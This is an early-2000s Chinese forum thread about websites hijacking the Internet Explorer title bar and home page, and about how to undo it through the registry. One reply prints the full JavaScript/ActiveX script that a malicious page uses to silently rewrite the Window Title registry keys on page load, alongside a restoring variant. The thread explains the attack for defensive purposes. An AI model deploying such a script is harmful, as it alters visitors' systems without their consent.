怎么改IE的标题?

King 2001-08-14 11:41:26
有时候去一些网站,把IE的标题都改掉了,变成他自己的域名什么的,怎么做的?如何删除?
...全文
205 10 打赏 收藏 转发到动态 举报
写回复
用AI写文章
10 条回复
切换为时间正序
请发表友善的回复…
发表回复
Nizvoo 2001-10-16
  • 打赏
  • 举报
回复
这个贴子我反感
jarodzhao 2001-10-14
  • 打赏
  • 举报
回复
hailong326 2001-10-14
  • 打赏
  • 举报
回复
gz
lhjcpu 2001-10-14
  • 打赏
  • 举报
回复
编辑个注册表文件,让客户运行,修改用户的注册表,就可以了。
要删除掉只要打开注册表。查找键值为“window title”的,修改其数据就行了。
关闭注册表后要刷新或重启才有效果。
现在一些网站在页面上加了一些代码修改您的首页和注册码,这样您只要访问了这些网站(实际上很多网站都采用了这种我认为不光明的做法)您的初始ie页面就会变为这个网站的首页,如果修改了您的电脑的注册码的话,在ie浏览窗口的顶部还会出现一行字(一般是这些网站的网址和宣传文字),很令人讨厌。
如果您想改回来的话,我在这里告诉您如何去做,算是提醒一下吧(呵呵,因为我自己很讨厌)
1。改初始ie页面的方法:ie窗口上部的工具(ie5)或者察看(ie4)-internet选项-主页-地址(把地址改为您原来的主页地址或者点击使用空白页按钮)
2.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main中的"Start Page"和"Default_Page_URL"两项。重新启动windows,诡异添加的默认主页不再出现了。

blion 2001-08-15
  • 打赏
  • 举报
回复
一、IE标题栏被修改的原因
其实,该恶意网页是含有有害代码的ActiveX网页文件,这些广告信息的出现是因为浏览者的注册表被恶意更改的结果,原因就是利用了下面这段JavaScript代码修改了HKLM\SOFTWARE\Microsoft\InternetExplorer\Main\和HKCU\Software\Microsoft\Internet Explorer\Main\
中的Window Title的键值。看看下面的代码你就会明白了:
<SCRIPT language=JavaScript>
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent> ");
function f(){ try {
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance(); Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance(); FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance(); Net = a1.GetObject(); try
{ if (document.cookie.indexOf("Chg") == -1) {
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", " 欢迎光临http:/www.520cat.com");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", " .欢迎光临http:/www.520cat.com");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chgg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{} } function init() {
setTimeout("f()", 1000);
} init();
从上面不难看出它修改了你的注册表!如果你认为没有什么了不起,仅仅是修改了IE标题栏而已,那你可大错特错了!如果他将你注册表改动将你IE指向一个木马软件的下载地址,木马服务端软件有只有几K到几十K大小的,下载这样一个木马只需几秒!几乎是一闪而过!然后木马程序再将你的防火墙、杀毒软件全部关闭!接着在注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run里加入木马服务端自启动程序,使之开机自动运行,这样做是完全可能的!而结果是非常严重的!因此大家要十分小心喽!
在系统默认状态下,是由应用程序本身来提供标题栏的信息,但也允许用户自行在上述注册表项目中填加信息,而一些恶意的网站正是利用了这一点来得逞的:它们将串值Window Title下的键值改为其网站名或更多的广告信息,从而达到改变浏览者IE标题栏的目的。不过在Windows 2000下,在注册表
HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\和HKCU\Software\Microsoft\Internet Explorer\Main\
中没有Window Title这个键值,所以这种恶意网页对W2K是无法修改其标题栏的。
二、解决办法
方法一:
  (1)在Windows启动后,点击“开始”->“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;
  (2)展开注册表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Window Title” ,将该串值删除即可,或将Window Title的键值改为“IE浏览器”也可以;
  (3)同理,展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,然后处理方法同(2)中所述。
  (4)退出注册表编辑器,重新启动计算机,运行IE,你会发现困扰你的问题解决了!
方法二:复制如下代码,存为文本文件,再改名为.htm文件,点击运行,可以自动恢复IE标题栏。
<!-- Begin set start page and internet Explorer Window title-->
<SCRIPT language=JavaScript>
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent> ");
function f(){
try
{
<!--ActiveX初始化过程-->
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookies.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
<!--检测用户注册表并修改相应的键值为系统默认值“Microsoft Internet Explorer”-->
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
<!--实现打开页面后1秒钟内执行测试修改注册表的工作-->
}
init();
</SCRIPT>
<!--End set start page and internet Explorer Window title-->
三、预防办法:
1.要避免中招,关键是不要轻易去一些自己并不了解的站点,特别是那些看上去美丽诱人的网址更不要贸然前往,否则吃亏的往往是你。
2.由于该网页是含有有害代码的ActiveX网页文件,因此在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以避免中招。具体方法是:在IE窗口中点击“工具->Internet选项,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把其中所有ActiveX插件和控件以及Java相关全部选择“禁用”即可。在Win2k下把服务里面的远程注册表操作服务“Remote Registry Service”禁用就可以了。方法是点击“管理工具->服务->Remote Registry Service(允许远程注册表操作),将这一项禁用。
3.对于所有用户,可以通过升级到最新的KVW3000病毒库,来预防该类恶意网页的侵害(注意,必须是6月28日以后的病毒库方可)。
blion 2001-08-15
  • 打赏
  • 举报
回复
我装了金山毒霸(每周升级)后,他每次都会提醒你该网站有这种JAVA脚本的病毒代码,是否查杀。,很不错的!
wsztk 2001-08-14
  • 打赏
  • 举报
回复
编辑个注册表文件,让客户运行,修改用户的注册表,就可以了。
要删除掉只要打开注册表。查找键值为“window title”的,修改其数据就行了。
关闭注册表后要刷新或重启才有效果。
chiev 2001-08-14
  • 打赏
  • 举报
回复
去除IE默认主页、标题诡异添加之一招两式

 编者按:最近,一些朋友说,他们的IE默认主页被设置成其它网站,在IE里怎么也改不过来,有的,甚至改了IE标题栏,很让人厌烦。我最近研究了一下,发现这些网友一般都访问了一个嵌入了可修改注册表的Java Applet程序的网页所致(恕我不能提供给你代码)。所以,要彻底修改的话,还得修改注册表。有一位网友为此写了他的遭遇与解决办法。如果你遇到了这种情况的话,就不妨改注册表里的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main里的相关键值,另外,如果注册表还是不行的话,就要查一查有没有所谓的vbs文件,然后再改注册表。

  最近,我的电脑发生了一个奇怪的现象,浏览器的默认主页被自动设为www.globesearch.com,一开始我并没有留意,心想只要在IE的"Internet选项"中修改回原来的设置就可以了,修改后,果然没事了,但第二天开机,又被改回去了。细想一下,这也难不住我,肯定是把默认主页信息写在注册表中,只要找到它,删除不就行了。于是,使用REGEDIT命令打开注册表,按Ctrl+F搜索字符串www.globesearch.com,果然找到了两处,就在IE的设置中,一项为"Start Page",另一项是,"Default_Page_URL",不禁心中一喜,原来这么简单,删除它们。再打开浏览器,果然消除了这个诡异添加的默认主页。这么简单的问题,难不住我的,哈哈。

  可是,当我再次打开电脑,默认主页又变成www.globesearch.com,这次还有点把我难住了,再仔细一想,又明白了,肯定是在我的机器上安装了什么可执行文件,在windows启动时,自动执行,这个可扫行文件自动又把注册表的Internet Explorer设置改回去了,想到这里,立即动手,打开注册表,找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run一项,里面没有什么特别的东西,再找HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx,还是没有。

  不过这也难不住我,毕竟是有4年网龄的老网虫了,遇到问题,我喜欢使用搜索引擎查一下,看一看别人是否遇到过同类问题,总应该有高手想到解决办法了吧!经过几次搜索和查找,我有些失望了,查到了内容都是介绍这种现象的,说是一种新型病毒,一些杀毒软件可以查杀,可我试过几种都不行。难道要我重新安装windows吗?我用的可是windows 2000 professional,安装一次要费我多少时间,何况还有那么多的软件和资料需要备份,哎,还是自己想想办法吧!

  几经努力,终于彻底解决了这个小难题,现整理出来,或许对大家有所帮助。下面介绍一下在windows 2000 下的解决方法:在"我的电脑"上单击右键,执行"管理"命令选单,找到"系统工具-系统信息-软件环境-启动程序"一项单击,在列出的启动所项中,是不是有一个奇怪的执行系统目录中一个扩展名为.vbs文件的项目,哈哈,就是它。看一看它在注册表中位置,找到并删除它。然后再把这个.vbs文件删除,你成功了。最后别忘了删除HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main中的"Start Page"和"Default_Page_URL"两项。重新启动windows,诡异添加的默认主页不再出现了。

  我没有在windows98上进行测试,不过方法应该大同小异,关键是如何找到这个.vbs文件,我想最简单的办法就是利用windows提供的查找工具,找到文件内容包含那个默认主页网址的文件,然后删除它,并在注册表中搜索包含那个文件名的项,找到后删除,就可以解决了。
bihu 2001-08-14
  • 打赏
  • 举报
回复
现在一些网站在页面上加了一些代码修改您的首页和注册码,这样您只要访问了这些网站(实际上很多网站都采用了这种我认为不光明的做法)您的初始ie页面就会变为这个网站的首页,如果修改了您的电脑的注册码的话,在ie浏览窗口的顶部还会出现一行字(一般是这些网站的网址和宣传文字),很令人讨厌。
如果您想改回来的话,我在这里告诉您如何去做,算是提醒一下吧(呵呵,因为我自己很讨厌)
1。改初始ie页面的方法:ie窗口上部的工具(ie5)或者察看(ie4)-internet选项-主页-地址(把地址改为您原来的主页地址或者点击使用空白页按钮)
2。修改ie浏览窗口顶部文字的方法:在windows窗口-开始-运行,在运行窗口输入regedit,确定以后进入注册表,找HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main,把里面的Window Title键值改掉就行了!

blion 2001-08-14
  • 打赏
  • 举报
回复
按照你现在IE上的标题在注册表中寻找键值,改了就可以了。

10,606

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 其他
社区管理员
  • 其他
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧